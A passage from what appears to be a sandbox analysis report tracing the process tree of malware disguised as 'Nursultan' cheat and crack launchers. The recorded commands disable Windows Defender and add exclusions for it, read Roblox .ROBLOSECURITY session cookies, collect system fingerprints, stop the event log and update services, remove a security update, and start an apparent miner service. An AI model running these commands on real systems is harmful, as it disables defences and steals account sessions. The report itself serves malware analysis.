        PID:2484
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        27⤵
        Power Settings
        
        PID:2228
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        27⤵
        Power Settings
        
        PID:2008
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        27⤵
        Launches sc.exe
        
        PID:2600
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        27⤵
        Launches sc.exe
        
        PID:2668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        26⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        26⤵
        
        PID:764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        26⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        26⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        27⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        26⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        27⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        27⤵
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        27⤵
        Drops file in Drivers directory
        
        PID:1356
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        28⤵
        Views/modifies file attributes
        
        PID:2628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        28⤵
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:2564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:2632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:1492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:2208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:1672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        
        PID:824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:2672
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        28⤵
        
        PID:1724
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        Runs ping.exe
        
        PID:1508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        27⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        27⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        28⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        27⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        28⤵
        
        PID:1928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        28⤵
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        28⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2892
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        29⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        28⤵
        Loads dropped DLL
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        29⤵
        
        PID:2520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        29⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        29⤵
        Drops file in Drivers directory
        
        PID:876
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        30⤵
        Views/modifies file attributes
        
        PID:1184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        30⤵
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        
        PID:2664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:2296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:2752
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:1576
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:1644
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:3040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        
        PID:2388
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:1216
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        30⤵
        
        PID:1992
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        Runs ping.exe
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        29⤵
        
        PID:2740
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        29⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1328
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        30⤵
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        29⤵
        Adds Run key to start application
        
        PID:2492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        30⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        30⤵
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        30⤵
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2764
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        30⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2956
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        31⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        30⤵
        Adds Run key to start application
        
        PID:1588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        31⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        31⤵
        Drops file in System32 directory
        
        PID:2936
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        32⤵
        Drops file in System32 directory
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        32⤵
        
        PID:1684
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        33⤵
        Drops file in Windows directory
        
        PID:1672
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        32⤵
        Launches sc.exe
        
        PID:2548
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        32⤵
        Launches sc.exe
        
        PID:1932
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        32⤵
        Launches sc.exe
        
        PID:2432
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        32⤵
        Launches sc.exe
        
        PID:2416
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        32⤵
        Launches sc.exe
        
        PID:2768
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        32⤵
        Power Settings
        
        PID:828
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        32⤵
        Power Settings
        
        PID:3020
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        32⤵
        Power Settings
        
        PID:2304
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        32⤵
        Power Settings
        
        PID:1528
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        32⤵
        
        PID:2212
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        32⤵
        Launches sc.exe
        
        PID:2540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        31⤵
        Drops file in Drivers directory
        
        PID:2084
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        32⤵
        Views/modifies file attributes
        
        PID:1956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        32⤵
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        
        PID:320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:2092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:280
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:1636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        
        PID:304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:1932
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        32⤵
        
        PID:2720
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        Runs ping.exe
        
        PID:2672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        31⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1768
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        32⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        31⤵
        Adds Run key to start application
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        32⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        32⤵
        
        PID:2168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        32⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        32⤵
        
        PID:2756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:532
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        32⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1472
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        33⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        32⤵
        Adds Run key to start application
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        33⤵
        
        PID:792
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        33⤵
        
        PID:1492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:620
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        33⤵
        Drops file in Drivers directory
        
        PID:1644
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        34⤵
        Views/modifies file attributes
        
        PID:2264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        34⤵
        
        PID:2948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        34⤵
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:1972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:1472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        34⤵
        
        PID:2264
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        34⤵
        
        PID:2764
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        34⤵
        
        PID:2416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        34⤵
        
        PID:2012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        34⤵
        Detects videocard installed
        
        PID:2768
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        34⤵
        
        PID:2364
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        35⤵
        Runs ping.exe
        
        PID:1568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        33⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        33⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1572
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        34⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        33⤵
        Adds Run key to start application
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        34⤵
        
        PID:2416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        34⤵
        
        PID:916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        34⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        34⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        35⤵
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        34⤵
        Adds Run key to start application
        
        PID:2060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        35⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
